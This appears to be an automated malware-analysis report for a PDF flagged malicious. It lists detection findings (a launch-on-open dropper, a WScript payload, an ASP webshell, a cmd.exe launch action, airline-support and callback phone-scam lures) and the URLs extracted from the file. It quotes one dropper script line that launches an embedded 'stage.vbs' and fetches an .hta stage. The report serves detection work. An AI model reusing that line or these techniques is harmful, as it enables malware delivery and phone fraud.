MALICIOUS
450
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 0.9868
Heuristics 16
-
JavaScript action low 4 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
exportDataObject + nLaunch — embedded-file launch-on-open dropper critical PDF_JS_EXPORT_LAUNCH_DROPPERPDF JavaScript calls exportDataObject() with nLaunch set, which extracts the document's embedded file and launches it in its default application. This is a launch-on-open dropper: the embedded file is the payload. No benign workflow auto-launches an extracted PDF attachment. (identified after JavaScript deobfuscation)
-
PDF JavaScript embeds a Windows Script Host payload high PDF_JS_WSCRIPT_PAYLOADPDF JavaScript contains a Windows Script Host/JScript payload using WScript.CreateObject and WScript.Shell with environment, run/exec, registry, sleep, or downloader-adjacent behavior. This is suspicious payload delivery but is not attributed to a specific Acrobat CVE unless a parser/API trigger is also found.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript opens or fetches a remote URL/document low PDF_JS_REMOTE_DOC_FETCHEmbedded JavaScript calls app.openDoc() against a remote filesystem (cFS:'CHTTP'/'CFTP') or app.launchURL() to open an external / base64-encoded URL. This is the JS-driven remote-document / phishing-redirect technique — distinct from a /Launch file dropper. It exploits no CVE; the risk is where the URL leads.Matched line in script
try{this.exportDataObject({cName:"stage.vbs",nLaunch:2});}catch(e1){}try{app.launchURL("http://localhost:3000/files/stage-1776779261.hta",true);}catch(e2){} -
ASP webshell / backdoor source high WEBSHELL_ASPThe file contains classic ASP webshell code — eval/Execute over Request input, or WScript.Shell.Run of request data — i.e. server-side remote-command-execution backdoor source.
-
OpenAction trigger high PDF_OPENACTIONPDF has an /OpenAction that launches, submits, or opens an external target
-
Launch action high PDF_LAUNCHPDF contains a /Launch action with an unresolved or extension-less target — treat as potentially dangerous
-
Embedded script payload in PDF stream high PDF_EMBEDDED_SCRIPT_PAYLOADPDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.
-
/Launch action target: cmd\056exe high PDF_LAUNCH_COMMANDPDF /Launch action specifies an executable target.
-
Travel-support phone-number stuffing scam high SE_TRAVEL_SUPPORT_PHONE_SCAMDocument repeats phone numbers in airline/travel/refund/support language, often across multiple regional phrasings. This matches SEO/support-scam PDFs that impersonate airlines or travel brands and route users to attacker-controlled call centers rather than a normal travel document.
-
Callback phishing phone lure medium SE_CALLBACK_LUREDocument asks the user to call a phone number in billing, refund, subscription, fraud, or security context — consistent with callback phishing or tech-support scam patterns. Suppressed for legitimate-issuer (IRS/gov/official-form) or Microsoft license-boilerplate documents that carry no urgency or charge/dispute escalation.
-
Embedded file low PDF_EMBEDDEDPDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
-
External URI low PDF_URIPDF contains an external URL action
-
PDF static-analysis soft budget exhausted low SCAN_INCOMPLETEThe bounded PDF scanner skipped late sub-format walkers after the configured per-file soft deadline. Earlier findings remain valid.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.redteamsecure.com Referenced by PDF JavaScript
- http://www.redteamsecure.com/labs/all_projectsReferenced by PDF JavaScript
- http://dradisframework.org/Referenced by PDF JavaScript
- http://keepnote.org/Referenced by PDF JavaScript
- http://www.exploit-db/google-dorks/Referenced by PDF JavaScript
- http://www.googleguide.com/advanced_operators_reference.htmlReferenced by PDF JavaScript
- http://www.shodanhq.com/help/filtersReferenced by PDF JavaScript
- http://www.shodanhq.com/helpReferenced by PDF JavaScript
- http://www.unshredder.com/Referenced by PDF JavaScript
- https://github.com/trustedsec/socialengineerReferenced by PDF JavaScript
- http://www.paterva.com/web6/products/download2.phpReferenced by PDF JavaScript
- http://www.proofpronto.com/gps-tracking-Referenced by PDF JavaScript
- https://www.spoofcard.com/appsReferenced by PDF JavaScript
- http://toool.us/Referenced by PDF JavaScript
- http://acehackware.com/collections/Referenced by PDF JavaScript
- https://searchwwwReferenced by PDF JavaScript
- http://mblsportalReferenced by PDF JavaScript
- http://dialabc.com/sound/detect/Referenced by PDF JavaScript
- http://www.redteamsecure.com/Referenced by PDF JavaScript
- http://www.brickhousesecurity.com/Referenced by PDF JavaScript
- http://localhost:3000/files/stage-1776779261.htaReferenced by PDF JavaScript
- http://facebook.com/redteamsecure/Referenced by PDF JavaScript
- http://twitter.com/redteamsecure/Referenced by PDF JavaScript
- http://www.linkedin.com/in/jtalamantes/Referenced by PDF JavaScript
- http://www.facebook.com/redteamsecureReferenced by PDF JavaScript
- http://twitter.com/redteamsecureReferenced by PDF JavaScript
- http://books.google.com/books/Referenced by PDF JavaScript
- http://money.cnn.com/2013/04/08/technology/security/shodan/Referenced by PDF JavaScript
- http://www.whois.net/Referenced by PDF JavaScript
- http://www.intelius.comReferenced by PDF JavaScript
- http://www.ussearch.comReferenced by PDF JavaScript
- http://www.peoplefinders.comReferenced by PDF JavaScript
- http://www.kali.org/downloads/Referenced by PDF JavaScript
- http://www.rapid7.com/products/metasploit/Referenced by PDF JavaScript
- http://www.rapid7.com/products/metasploit/metasploit-pro-registration.jspReferenced by PDF JavaScript
- http://www.newegg.com/Product/Product.aspxReferenced by PDF JavaScript
- https://www.youtubeReferenced by PDF JavaScript
- http://www.readspeaker.com/voice-demo/Referenced by PDF JavaScript
- https://www.youtube.com/watchReferenced by PDF JavaScript
Open this report in the interactive analyzer, or submit your own file for analysis.